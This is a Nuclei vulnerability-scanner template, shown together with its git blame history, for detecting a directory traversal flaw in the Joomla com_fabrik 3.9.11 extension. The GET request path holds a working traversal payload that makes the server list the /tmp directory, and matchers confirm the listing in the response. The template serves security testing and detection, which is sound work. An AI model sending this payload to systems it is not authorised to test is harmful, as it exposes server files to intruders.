nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml

id: joomla-com-fabrik-lfi

info:
  name: Joomla! com_fabrik 3.9.11 - Directory Traversal
  author: dhiyaneshDk
  severity: high
  tags: joomla,lfi
  reference: https://www.exploit-db.com/exploits/48263

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"value":'
          - '"disable":false'
          - 'text'
        part: body
        condition: and

      - type: status
        status:
          - 200
minor update 2021-05-07 09:23:34 +00:00			`id: joomla-com-fabrik-lfi`
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00
			`info:`
			`name: Joomla! com_fabrik 3.9.11 - Directory Traversal`
			`author: dhiyaneshDk`
			`severity: high`
minor update 2021-05-07 09:23:34 +00:00			`tags: joomla,lfi`
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00			`reference: https://www.exploit-db.com/exploits/48263`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'`
minor update 2021-05-07 09:23:34 +00:00
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
minor update 2021-05-07 09:23:34 +00:00			`- '"value":'`
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00			`- '"disable":false'`
minor update 2021-05-07 09:23:34 +00:00			`- 'text'`
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00			`part: body`
minor update 2021-05-07 09:23:34 +00:00			`condition: and`
Create joomla-lfi-com_fabrik.yaml 2021-05-05 18:18:57 +00:00
			`- type: status`
			`status:`
			`- 200`